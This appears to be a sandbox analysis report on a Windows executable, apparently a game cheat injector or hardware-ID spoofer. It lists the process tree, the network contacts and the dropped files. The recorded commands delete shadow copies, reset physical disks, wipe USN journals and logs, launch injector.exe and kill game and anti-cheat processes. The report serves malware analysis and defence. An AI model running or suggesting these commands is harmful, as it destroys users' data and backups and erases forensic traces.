C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int reset all >nul
C:\Windows\system32\netsh.exe
netsh int reset all
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
C:\Windows\system32\netsh.exe
netsh int ipv4 reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
C:\Windows\system32\netsh.exe
netsh int ipv6 reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
C:\Windows\system32\netsh.exe
netsh winsock reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell vssadmin delete shadows /all
C:\Windows\system32\vssadmin.exe
"C:\Windows\system32\vssadmin.exe" delete shadows /all
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Reset-PhysicalDisk *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n C:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n D:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n E:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n F:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Default\AppData\Roaming\injector.exe
C:\Users\Default\AppData\Roaming\injector.exe
C:\Users\Default\AppData\Roaming\injector.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | licenseauth.host | udp |
| GB | 109.70.148.32:443 | licenseauth.host | tcp |
| US | 8.8.8.8:53 | 32.148.70.109.in-addr.arpa | udp |
| N/A | 127.0.0.1:64889 | | tcp |
| N/A | 127.0.0.1:64891 | | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 109.70.148.32:443 | licenseauth.host | tcp |
| N/A | 127.0.0.1:64902 | | tcp |
| N/A | 127.0.0.1:64904 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aersm.cdn.zerocdn.com | udp |
| RU | 176.58.48.48:443 | aersm.cdn.zerocdn.com | tcp |
| US | 8.8.8.8:53 | 48.48.58.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aersm.parthenon.zerocdn.com | udp |
| US | 185.190.188.199:443 | aersm.parthenon.zerocdn.com | tcp |
| US | 8.8.8.8:53 | aersm.coliseum.zerocdn.com | udp |
| US | 185.190.188.195:443 | aersm.coliseum.zerocdn.com | tcp |
| US | 8.8.8.8:53 | 199.188.190.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.188.190.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ivep2ymj.z0c.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RUNTIM~1.EXE
C:\Users\Default\AppData\Roaming\injector.exe